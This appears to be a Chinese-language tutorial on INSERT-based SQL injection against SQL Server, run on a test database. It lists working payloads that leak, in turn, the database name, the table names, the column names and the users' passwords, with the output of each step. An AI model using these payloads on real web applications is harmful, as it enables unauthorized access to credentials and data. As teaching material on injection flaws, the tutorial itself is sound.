0x01 前言

UPDATE-INSERT的注入是一样的,这里演示的话,我就使用 INSERT 注入演示了

因为他们的注入都是修改某条数据/插入某条数据,然后我们去其他界面查看

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 获取库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?data=‘+db_name()+’

数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+db_name()+’’)

  1. 1> INSERT INTO article(title, content)VALUES('漏洞测试', ''+db_name()+'')
  2. 2> go
  3. (1 rows affected)
  4. # 当前库 = test
  5. 1> select * from article
  6. 2> go
  7. +----+-----------+-----------+
  8. | id | title | content |
  9. +----+-----------+-----------+
  10. | 1 | 测试标题 | 测试内容 |
  11. | 2 | 测试标题2 | 测试内容2 |
  12. | 5 | 漏洞测试 | test |
  13. +----+-----------+-----------+
  14. (3 rows affected)

0x04 获取表名

注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段

查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;

web语句: http://www.test.com/sql.php?data=‘+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’

数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)+’’)

  1. # 获取 1表
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. name
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  13. name
  14. FROM
  15. test.dbo.sysobjects
  16. WHERE
  17. XType = 'U'
  18. ) AS a
  19. WHERE
  20. row_number = 1
  21. ) + ''
  22. )
  23. 2> go
  24. (1 rows affected)
  25. 1> select * from article
  26. 2> go
  27. +----+-----------+-----------+
  28. | id | title | content |
  29. +----+-----------+-----------+
  30. | 1 | 测试标题 | 测试内容 |
  31. | 2 | 测试标题2 | 测试内容2 |
  32. | 6 | 漏洞测试 | article |
  33. +----+-----------+-----------+
  34. (3 rows affected)
  1. # 获取 2表
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. name
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  13. name
  14. FROM
  15. test.dbo.sysobjects
  16. WHERE
  17. XType = 'U'
  18. ) AS a
  19. WHERE
  20. row_number = 2
  21. ) + ''
  22. )
  23. 2> go
  24. (1 rows affected)
  25. 1> select * from article
  26. 2> go
  27. +----+-----------+-----------+
  28. | id | title | content |
  29. +----+-----------+-----------+
  30. | 1 | 测试标题 | 测试内容 |
  31. | 2 | 测试标题2 | 测试内容2 |
  32. | 7 | 漏洞测试 | users |
  33. +----+-----------+-----------+
  34. (3 rows affected)

0x05 获取字段

注意:
OVER(Order by name ) 里面的 name 要修改为 test.dbo.SysColumns 表里面存在的一个字段

查询不同的表可以这样
例如:
Object_id(‘要查询的表名’)

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?data=‘+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’

数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id(‘users’)) as a where a.row_number=1)+’’)

  1. # users 表字段名称
  2. 1> select name FROM test.dbo.SysColumns Where id=Object_id('users')
  3. 2> go
  4. +-----------+
  5. | name |
  6. +-----------+
  7. | id |
  8. | password |
  9. | username |
  10. +-----------+
  11. (3 rows affected)
  1. # 获取当前库 users表 第一个字段名称
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. TOP 1 name
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  13. name
  14. FROM
  15. test.dbo.SysColumns
  16. WHERE
  17. id = Object_id('users')
  18. ) AS a
  19. WHERE
  20. a.row_number = 1
  21. ) + ''
  22. )
  23. 2> go
  24. (1 rows affected)
  25. 1> select * from article
  26. 2> go
  27. +----+-----------+-----------+
  28. | id | title | content |
  29. +----+-----------+-----------+
  30. | 1 | 测试标题 | 测试内容 |
  31. | 2 | 测试标题2 | 测试内容2 |
  32. | 8 | 漏洞测试 | id |
  33. +----+-----------+-----------+
  34. (3 rows affected)
  1. # 获取当前库 users表 第二个字段名称
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. TOP 1 name
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  13. name
  14. FROM
  15. test.dbo.SysColumns
  16. WHERE
  17. id = Object_id('users')
  18. ) AS a
  19. WHERE
  20. a.row_number = 2
  21. ) + ''
  22. )
  23. 2> go
  24. (1 rows affected)
  25. 1> select * from article
  26. 2> go
  27. +----+-----------+-----------+
  28. | id | title | content |
  29. +----+-----------+-----------+
  30. | 1 | 测试标题 | 测试内容 |
  31. | 2 | 测试标题2 | 测试内容2 |
  32. | 9 | 漏洞测试 | password |
  33. +----+-----------+-----------+
  34. (3 rows affected)

0x06 获取内容

注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?data=‘+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’

数据库语句: INSERT INTO article(title, content)VALUES(‘漏洞测试’, ‘’+(select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+’’)

  1. # 查询users表 第一条数据
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  13. FROM
  14. users
  15. ) AS a
  16. WHERE
  17. row_number = 1
  18. ) + ''
  19. )
  20. 2> go
  21. (1 rows affected)
  22. 1> select * from article
  23. 2> go
  24. +----+-----------+-------------------------+
  25. | id | title | content |
  26. +----+-----------+-------------------------+
  27. | 1 | 测试标题 | 测试内容 |
  28. | 2 | 测试标题2 | 测试内容2 |
  29. | 10 | 漏洞测试 | 1 |test-user-01|123456 |
  30. +----+-----------+-------------------------+
  31. (3 rows affected)
  1. # 查询users表 第二条数据
  2. 1> INSERT INTO article (title, content)
  3. VALUES
  4. (
  5. '漏洞测试',
  6. '' + (
  7. SELECT
  8. CAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)
  9. FROM
  10. (
  11. SELECT
  12. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  13. FROM
  14. users
  15. ) AS a
  16. WHERE
  17. row_number = 2
  18. ) + ''
  19. )
  20. 2> go
  21. (1 rows affected)
  22. 1> select * from article
  23. 2> go
  24. +----+-----------+-------------------------+
  25. | id | title | content |
  26. +----+-----------+-------------------------+
  27. | 1 | 测试标题 | 测试内容 |
  28. | 2 | 测试标题2 | 测试内容2 |
  29. | 11 | 漏洞测试 | 2 |test-user-02|234567 |
  30. +----+-----------+-------------------------+
  31. (3 rows affected)